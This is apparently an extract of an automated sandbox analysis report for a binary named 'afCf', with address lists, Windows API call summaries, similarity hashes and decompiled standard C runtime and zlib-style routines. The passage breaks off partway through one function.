                            0x00417090
                            0x00417098
                            0x0041709a
                            0x004170a0
                            0x004170a6
                            0x004170bb
                            0x004170c5
                            0x004170cb
                            0x004170ce
                            0x004170d0
                            0x004170d0
                            0x004170bd
                            0x004170bd
                            0x004170bd
                            0x004170bb
                            0x004170dd
                            0x00417101
                            0x00417101
                            0x00417109
                            0x004172bb
                            0x004172be
                            0x004172c1
                            0x004172c4
                            0x004172cb
                            0x004172cb
                            0x004172ce
                            0x004172d1
                            0x004172d8
                            0x004172d8
                            0x004172de
                            0x004172e4
                            0x004172e7
                            0x004172ea
                            0x004172f3
                            0x004172f6
                            0x004173ef
                            0x004173f1
                            0x004173f1
                            0x004173f4
                            0x004173f6
                            0x004173f9
                            0x004173fe
                            0x004173ff
                            0x00417402
                            0x00417404
                            0x00417406
                            0x00417409
                            0x0041740b
                            0x0041740c
                            0x00417411
                            0x00417409
                            0x00417412
                            0x00000000
                            0x00417412
                            0x00417309
                            0x0041730e
                            0x00417311
                            0x00417314
                            0x00417316
                            0x00000000
                            0x00000000
                            0x0041732a
                            0x0041732c
                            0x0041732f
                            0x00417331
                            0x0041733a
                            0x00417379
                            0x00417379
                            0x00417379
                            0x0041737b
                            0x0041737b
                            0x0041737d
                            0x00000000
                            0x00000000
                            0x00417384
                            0x0041739c
                            0x0041739e
                            0x004173a1
                            0x004173a3
                            0x004173bf
                            0x004173c1
                            0x004173c9
                            0x004173cb
                            0x004173cb
                            0x004173a5
                            0x004173a5
                            0x004173a5
                            0x004173cf
                            0x00000000
                            0x004173d4
                            0x0041733c
                            0x0041733f
                            0x00000000
                            0x00000000
                            0x00417341
                            0x00417344
                            0x00417349
                            0x00417362
                            0x00417368
                            0x0041736a
                            0x0041736c
                            0x00417372
                            0x00417372
                            0x00417372
                            0x00417375
                            0x00000000
                            0x00417375
                            0x0041734b
                            0x00417350
                            0x00417352
                            0x00417354
                            0x00000000
                            0x00000000
                            0x00417356
                            0x0041735c
                            0x00000000
                            0x0041735c
                            0x00417333
                            0x00417333
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00417117
                            0x0041711a
                            0x004172ec
                            0x004172ec
                            0x00417414
                            0x00417425
                            0x00417425
                            0x00417120
                            0x00417126
                            0x0041712d
                            0x0041712d
                            0x00417130
                            0x00417153
                            0x00417155
                            0x00417157
                            0x00000000
                            0x0041715d
                            0x0041715d
                            0x004171a2
                            0x004171a2
                            0x004171a5
                            0x004171a8
                            0x00000000
                            0x00000000
                            0x004171c1
                            0x004172aa
                            0x004172ad
                            0x004172b2
                            0x00000000
                            0x004172b5
                            0x004171c7
                            0x004171db
                            0x004171dd
                            0x004171e2
                            0x00000000
                            0x00000000
                            0x004171ef
                            0x0041721a
                            0x0041721c
                            0x00417263
                            0x00417263
                            0x00417263
                            0x00417265
                            0x00417265
                            0x00417267
                            0x00417277
                            0x0041727d
                            0x0041727f
                            0x00417281
                            0x00417282
                            0x00417283
                            0x00417286
                            0x0041728c
                            0x0041728f
                            0x00417288
                            0x00417288
                            0x00417289
                            0x00417289
                            0x004172a0
                            0x004172a0
                            0x004172a4
                            0x004172a9
                            0x00000000
                            0x00417267
                            0x00417222
                            0x00417223
                            0x00417225
                            0x00417228
                            0x00000000
                            0x00000000
                            0x0041722a
                            0x0041722a
                            0x0041722e
                            0x00417233
                            0x0041724c
                            0x00417252
                            0x00417254
                            0x00417256
                            0x0041725c
                            0x0041725c
                            0x0041725c
                            0x0041725f
                            0x00000000
                            0x0041725f
                            0x00417235
                            0x0041723a
                            0x0041723c
                            0x0041723e
                            0x00000000
                            0x00000000
                            0x00417240
                            0x00417246
                            0x00000000
                            0x00417246
                            0x004171f4
                            0x00417213
                            0x00417213
                            0x00000000
                            0x004171f4
                            0x00417163
                            0x00417164
                            0x00417169
                            0x00000000
                            0x00000000
                            0x0041716b
                            0x0041716b
                            0x00417174
                            0x0041718a
                            0x00417190
                            0x00417192
                            0x0041719d
                            0x0041719d
                            0x00000000
                            0x0041719d
                            0x00417194
                            0x0041719a
                            0x0041719a
                            0x00000000
                            0x0041719a
                            0x00417176
                            0x0041717b
                            0x0041717f
                            0x00000000
                            0x00000000
                            0x00417181
                            0x00000000
                            0x00417181
                            0x00417157
                            0x00417109
                            0x004170df
                            0x004170e2
                            0x004170e5
                            0x004170e5
                            0x004170e8
                            0x00000000
                            0x00000000
                            0x004170ea
                            0x004170ed
                            0x00000000
                            0x00000000
                            0x004170ef
                            0x00000000
                            0x004170ef
                            0x004170f7
                            0x004170fb
                            0x004170fd
                            0x004170fd
                            0x004170fe
                            0x00000000

                            APIs
                            • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                            • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,007218D0), ref: 004170C5
                            • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                            • _malloc.LIBCMT ref: 0041718A
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                            • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                            • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                            • _malloc.LIBCMT ref: 0041724C
                            • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                            • __freea.LIBCMT ref: 004172A4
                            • __freea.LIBCMT ref: 004172AD
                            • ___ansicp.LIBCMT ref: 004172DE
                            • ___convertcp.LIBCMT ref: 00417309
                            • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                            • _malloc.LIBCMT ref: 00417362
                            • _memset.LIBCMT ref: 00417384
                            • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                            • ___convertcp.LIBCMT ref: 004173BA
                            • __freea.LIBCMT ref: 004173CF
                            • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                            Memory Dump Source
                            • Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                            • String ID:
                            • API String ID: 3809854901-0
                            • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                            • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                            • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                            • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 0067731A
                            • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00423620), ref: 0067732C
                            • _malloc.LIBCMT ref: 006773F1
                            • _malloc.LIBCMT ref: 006774B3
                            • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 006774DE
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 00677501
                            • __freea.LIBCMT ref: 0067750B
                            • __freea.LIBCMT ref: 00677514
                            • ___ansicp.LIBCMT ref: 00677545
                            • ___convertcp.LIBCMT ref: 00677570
                            • _malloc.LIBCMT ref: 006775C9
                            • _memset.LIBCMT ref: 006775EB
                            • ___convertcp.LIBCMT ref: 00677621
                            • __freea.LIBCMT ref: 00677636
                            • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00677650
                            Memory Dump Source
                            • Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_660000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: String__freea_malloc$___convertcp$ByteCharErrorLastMultiWide___ansicp_memset
                            • String ID:
                            • API String ID: 2918745354-0
                            • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                            • Instruction ID: 23ca67a7c43fd79ae190d34f33a365b5e335790ff671583eca0f6398ddcacd8e
                            • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                            • Instruction Fuzzy Hash: C2B19D72904119EFDF119FA4CC808EE7FB7EB48314B15C569F919A6220DB31CD91DBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00421320,0000000C,00670977,00000000,00000000,?,00000001,0066C22D,0066B993), ref: 0067084E
                            • __crt_waiting_on_module_handle.LIBCMT ref: 00670859
                              • Part of subcall function 0066E9D1: Sleep.KERNEL32(000003E8,00000000,?,0067079F,KERNEL32.DLL,?,006707EB,?,00000001,0066C22D,0066B993), ref: 0066E9DD
                              • Part of subcall function 0066E9D1: GetModuleHandleW.KERNEL32(00000001,?,0067079F,KERNEL32.DLL,?,006707EB,?,00000001,0066C22D,0066B993), ref: 0066E9E6
                            • __lock.LIBCMT ref: 006708B4
                            • InterlockedIncrement.KERNEL32(?), ref: 006708C1
                            • __lock.LIBCMT ref: 006708D5
                            • ___addlocaleref.LIBCMT ref: 006708F3
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_660000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                            • String ID: @.B$KERNEL32.DLL
                            • API String ID: 4021795732-2520587274
                            • Opcode ID: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                            • Instruction ID: 6639f19481f10db5fc08aee1f665de895a0e52f341a66ce1f11a708f06c517e6
                            • Opcode Fuzzy Hash: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                            • Instruction Fuzzy Hash: 0E117571A40705EEE760AF35D80178ABBE5AF04310F50852EE4AD972A2CB749A458FAD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _malloc.LIBCMT ref: 00665A45
                              • Part of subcall function 0066BAB4: __FF_MSGBANNER.LIBCMT ref: 0066BAD7
                              • Part of subcall function 0066BAB4: __NMSG_WRITE.LIBCMT ref: 0066BADE
                            • _malloc.LIBCMT ref: 00665AA9
                            • _malloc.LIBCMT ref: 00665B6D
                            • _malloc.LIBCMT ref: 00665B97
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_660000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc
                            • String ID: 1.2.3
                            • API String ID: 1579825452-2310465506
                            • Opcode ID: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                            • Instruction ID: f925103a029c791e7527c48dc615e8a1d07eab1dddd27419d2754f29a79e804e
                            • Opcode Fuzzy Hash: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                            • Instruction Fuzzy Hash: 486104B1948B818FC7309F6988926ABFBE2FB55310F544E2EE1D783700D775984ACB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E004057B0(intOrPtr* __eax) {
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				intOrPtr* _t57;
                            				char* _t60;
                            				char _t62;
                            				intOrPtr _t63;
                            				char _t64;
                            				intOrPtr _t65;
                            				intOrPtr _t66;
                            				intOrPtr _t67;
                            				intOrPtr _t69;
                            				intOrPtr _t70;
                            				intOrPtr _t74;
                            				intOrPtr _t79;
                            				intOrPtr _t82;
                            				intOrPtr* _t83;
                            				void* _t86;
                            				char* _t88;
                            				char* _t89;
                            				intOrPtr* _t91;
                            				intOrPtr* _t93;
                            				signed int _t97;
                            				signed int _t98;
                            				void* _t100;
                            				void* _t101;
                            				void* _t102;
                            				void* _t103;
                            				void* _t104;
                            
                            				_t98 = _t97 | 0xffffffff;
                            				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                            				_t91 = __eax;
                            				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                            				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                            					__eflags = 0;
                            					return 0;
                            				} else {
                            					_t93 = E0040B84D(0, _t86, __eax, 0x74);
                            					_t101 = _t100 + 4;
                            					if(_t93 == 0) {
                            						L31:
                            						return 0;
                            					} else {
                            						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                            						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                            						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                            						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                            						 *_t93 = 0;
                            						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                            						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                            						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                            						 *((intOrPtr*)(_t93 + 4)) = 0;
                            						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                            						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                            						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                            						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                            						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                            						 *(_t93 + 0x6c) = _t98;
                            						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
                            						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                            						_t102 = _t101 + 0xc;
                            						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                            						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                            						_t87 = _t57 + 1;
                            						do {
                            							_t82 =  *_t57;
                            							_t57 = _t57 + 1;
                            						} while (_t82 != 0);
                            						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
                            						_t103 = _t102 + 4;
                            						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                            						if(_t60 == 0) {
                            							L30:
                            							E00405160(0, _t87, _t93);
                            							goto L31;
                            						} else {
                            							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                            							_t88 = _t60;
                            							goto L7;
                            							L9:
                            							L9:
                            							if( *_t91 == 0x72) {
                            								 *((char*)(_t93 + 0x5c)) = 0x72;
                            							}
                            							_t63 =  *_t91;
                            							if(_t63 == 0x77 || _t63 == 0x61) {
                            								 *((char*)(_t93 + 0x5c)) = 0x77;
                            							}
                            							_t64 =  *_t91;
                            							if(_t64 < 0x30 || _t64 > 0x39) {
                            								__eflags = _t64 - 0x66;
                            								if(_t64 != 0x66) {
                            									__eflags = _t64 - 0x68;
                            									if(_t64 != 0x68) {
                            										__eflags = _t64 - 0x52;
                            										if(_t64 != 0x52) {
                            											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                            											 *_t89 = _t64;
                            											_t87 = _t89 + 1;
                            											__eflags = _t87;
                            											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                            										} else {
                            											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                            										}
                            									} else {
                            										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                            									}
                            								} else {
                            									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                            								}
                            							} else {
                            								_t98 = _t64 - 0x30;
                            							}
                            							_t91 = _t91 + 1;
                            							if(_t64 == 0) {
                            								goto L26;
                            							}
                            							_t87 = _t103 + 0x68;
                            							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                            								goto L9;
                            							}
                            							L26:
                            							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                            							if(_t65 == 0) {
                            								goto L30;
                            							} else {
                            								if(_t65 != 0x77) {
                            									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
                            									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                            									 *_t93 = _t66;
                            									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
                            									_t104 = _t103 + 0x14;
                            									__eflags = _t67;
                            									if(_t67 != 0) {
                            										goto L30;
                            									} else {
                            										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                            										if(__eflags == 0) {
                            											goto L30;
                            										} else {
                            											goto L34;
                            										}
                            									}
                            								} else {
                            									_push(0x38);
                            									_push("1.2.3");
                            									_push( *((intOrPtr*)(_t103 + 0x10)));
                            									_push(8);
                            									_push(0xfffffff1);
                            									_push(8);
                            									_push(_t98);
                            									_push(_t93);
                            									_t91 = E00404CE0();
                            									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
                            									_t104 = _t103 + 0x24;
                            									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                            									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                            									if(_t91 != 0 || _t79 == 0) {
                            										goto L30;
                            									} else {
                            										L34:
                            										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                            										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                            										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                            										__eflags = _t69;
                            										_push(_t104 + 0x18);
                            										if(__eflags >= 0) {
                            											_push(_t69);
                            											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
                            										} else {
                            											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                            											_push( *((intOrPtr*)(_t104 + 0x70)));
                            											_t70 = E0040CB9D();
                            										}
                            										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                            										__eflags = _t70;
                            										if(_t70 == 0) {
                            											goto L30;
                            										} else {
                            											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                            											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                            												E00405000(_t93, 0);
                            												_push( *((intOrPtr*)(_t93 + 0x40)));
                            												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                            												__eflags = _t74;
                            												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                            												return _t93;
                            											} else {
                            												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                            												return _t93;
                            											}
                            										}
                            									}
                            								}
                            							}
                            							goto L42;
                            							L7:
                            							_t62 =  *_t83;
                            							 *_t88 = _t62;
                            							_t83 = _t83 + 1;
                            							_t88 = _t88 + 1;
                            							if(_t62 != 0) {
                            								goto L7;
                            							} else {
                            								 *((char*)(_t93 + 0x5c)) = 0;
                            							}
                            							goto L9;
                            						}
                            					}
                            				}
                            				L42:
                            			}

































                            0x004057b7
                            0x004057bf
                            0x004057c3
                            0x004057c5
                            0x004057cd
                            0x004059c8
                            0x004059ce
                            0x004057db
                            0x004057e3
                            0x004057e5
                            0x004057ea
                            0x00405921
                            0x0040592a
                            0x004057f0
                            0x004057f3
                            0x004057f6
                            0x004057f9
                            0x004057fc
                            0x004057ff
                            0x00405801
                            0x00405804
                            0x00405807
                            0x0040580a
                            0x0040580d
                            0x00405810
                            0x00405813
                            0x00405816
                            0x00405819
                            0x0040581c
                            0x00405824
                            0x00405827
                            0x0040582b
                            0x0040582e
                            0x00405831
                            0x00405834
                            0x00405837
                            0x00405837
                            0x00405839
                            0x0040583a
                            0x00405842
                            0x00405847
                            0x0040584a
                            0x0040584f
                            0x0040591c
                            0x0040591c
                            0x00000000
                            0x00405855
                            0x00405855
                            0x00405859
                            0x0040585b
                            0x00000000
                            0x00405870
                            0x00405872
                            0x00405874
                            0x00405874
                            0x00405877
                            0x0040587b
                            0x00405881
                            0x00405881
                            0x00405885
                            0x00405889
                            0x00405897
                            0x00405899
                            0x004058a5
                            0x004058a7
                            0x004058b3
                            0x004058b5
                            0x004058c1
                            0x004058c5
                            0x004058c7
                            0x004058c7
                            0x004058c8
                            0x004058b7
                            0x004058b7
                            0x004058b7
                            0x004058a9
                            0x004058a9
                            0x004058a9
                            0x0040589b
                            0x0040589b
                            0x0040589b
                            0x0040588f
                            0x00405892
                            0x00405892
                            0x004058cc
                            0x004058cf
                            0x00000000
                            0x00000000
                            0x004058d1
                            0x004058d9
                            0x00000000
                            0x00000000
                            0x004058db
                            0x004058db
                            0x004058e0
                            0x00000000
                            0x004058e2
                            0x004058e4
                            0x00405930
                            0x0040593f
                            0x00405942
                            0x00405944
                            0x00405949
                            0x0040594c
                            0x0040594e
                            0x00000000
                            0x00405950
                            0x00405950
                            0x00405953
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00405953
                            0x004058e6
                            0x004058ea
                            0x004058ec
                            0x004058f1
                            0x004058f2
                            0x004058f4
                            0x004058f6
                            0x004058f8
                            0x004058f9
                            0x00405904
                            0x00405906
                            0x0040590b
                            0x0040590e
                            0x00405911
                            0x00405916
                            0x00000000
                            0x00405955
                            0x00405955
                            0x00405955
                            0x00405961
                            0x00405963
                            0x00405967
                            0x0040596d
                            0x0040596e
                            0x0040597c
                            0x0040597d
                            0x00405970
                            0x00405970
                            0x00405974
                            0x00405975
                            0x00405975
                            0x00405985
                            0x00405988
                            0x0040598a
                            0x00000000
                            0x0040598c
                            0x0040598c
                            0x00405990
                            0x004059a5
                            0x004059ad
                            0x004059b6
                            0x004059b6
                            0x004059b9
                            0x004059c5
                            0x00405992
                            0x00405992
                            0x004059a2
                            0x004059a2
                            0x00405990
                            0x0040598a
                            0x00405916
                            0x004058e4
                            0x00000000
                            0x00405860
                            0x00405860
                            0x00405862
                            0x00405864
                            0x00405865
                            0x00405868
                            0x00000000
                            0x0040586a
                            0x0040586a
                            0x0040586d
                            0x00000000
                            0x00405868
                            0x0040584f
                            0x004057ea
                            0x00000000

                            APIs
                            • _malloc.LIBCMT ref: 004057DE
                              • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                              • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                              • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                            • _malloc.LIBCMT ref: 00405842
                            • _malloc.LIBCMT ref: 00405906
                            • _malloc.LIBCMT ref: 00405930
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc$AllocateHeap
                            • String ID: 1.2.3
                            • API String ID: 680241177-2310465506
                            • Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                            • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                            • Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                            • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_660000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                            • String ID:
                            • API String ID: 3886058894-0
                            • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                            • Instruction ID: ed8a9674063d5942b2e19c8fad2ac6f5832aab02a6d4623e1883e649225d0efb
                            • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                            • Instruction Fuzzy Hash: D951C671900609EBCB209F79CC445EEBBB7EF51330F248229F865962A1E7729E91DF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 85%
                            			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                            				signed int _v8;
                            				char* _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t90;
                            				intOrPtr* _t92;
                            				signed int _t94;
                            				char _t97;
                            				signed int _t105;
                            				void* _t106;
                            				signed int _t107;
                            				signed int _t110;
                            				signed int _t113;
                            				intOrPtr* _t114;
                            				signed int _t118;
                            				signed int _t119;
                            				signed int _t120;
                            				char* _t121;
                            				signed int _t125;
                            				signed int _t131;
                            				signed int _t133;
                            				void* _t134;
                            
                            				_t125 = __edx;
                            				_t121 = _a4;
                            				_t119 = _a8;
                            				_t131 = 0;
                            				_v12 = _t121;
                            				_v8 = _t119;
                            				if(_a12 == 0 || _a16 == 0) {
                            					L5:
                            					return 0;
                            				} else {
                            					_t138 = _t121;
                            					if(_t121 != 0) {
                            						_t133 = _a20;
                            						__eflags = _t133;
                            						if(_t133 == 0) {
                            							L9:
                            							__eflags = _t119 - 0xffffffff;
                            							if(_t119 != 0xffffffff) {
                            								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
                            								_t134 = _t134 + 0xc;
                            							}
                            							__eflags = _t133 - _t131;
                            							if(__eflags == 0) {
                            								goto L3;
                            							} else {
                            								_t94 = _t90 | 0xffffffff;
                            								_t125 = _t94 % _a12;
                            								__eflags = _a16 - _t94 / _a12;
                            								if(__eflags > 0) {
                            									goto L3;
                            								}
                            								L13:
                            								_t131 = _a12 * _a16;
                            								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                            								_v20 = _t131;
                            								_t120 = _t131;
                            								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                            									_v16 = 0x1000;
                            								} else {
                            									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                            								}
                            								__eflags = _t131;
                            								if(_t131 == 0) {
                            									L40:
                            									return _a16;
                            								} else {
                            									do {
                            										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                            										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                            											L24:
                            											__eflags = _t120 - _v16;
                            											if(_t120 < _v16) {
                            												_t97 = E0040FC07(_t120, _t125, _t133);
                            												__eflags = _t97 - 0xffffffff;
                            												if(_t97 == 0xffffffff) {
                            													L48:
                            													return (_t131 - _t120) / _a12;
                            												}
                            												__eflags = _v8;
                            												if(_v8 == 0) {
                            													L44:
                            													__eflags = _a8 - 0xffffffff;
                            													if(__eflags != 0) {
                            														E0040BA30(_t131, _a4, 0, _a8);
                            														_t134 = _t134 + 0xc;
                            													}
                            													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
                            													_push(0);
                            													_push(0);
                            													_push(0);
                            													_push(0);
                            													_push(0);
                            													L4:
                            													E0040E744(_t125, _t131, _t133);
                            													goto L5;
                            												}
                            												_t123 = _v12;
                            												_v12 = _v12 + 1;
                            												 *_v12 = _t97;
                            												_t120 = _t120 - 1;
                            												_t70 =  &_v8;
                            												 *_t70 = _v8 - 1;
                            												__eflags =  *_t70;
                            												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                            												goto L39;
                            											}
                            											__eflags = _v16;
                            											if(_v16 == 0) {
                            												_t105 = 0x7fffffff;
                            												__eflags = _t120 - 0x7fffffff;
                            												if(_t120 <= 0x7fffffff) {
                            													_t105 = _t120;
                            												}
                            											} else {
                            												__eflags = _t120 - 0x7fffffff;
                            												if(_t120 <= 0x7fffffff) {
                            													_t55 = _t120 % _v16;
                            													__eflags = _t55;
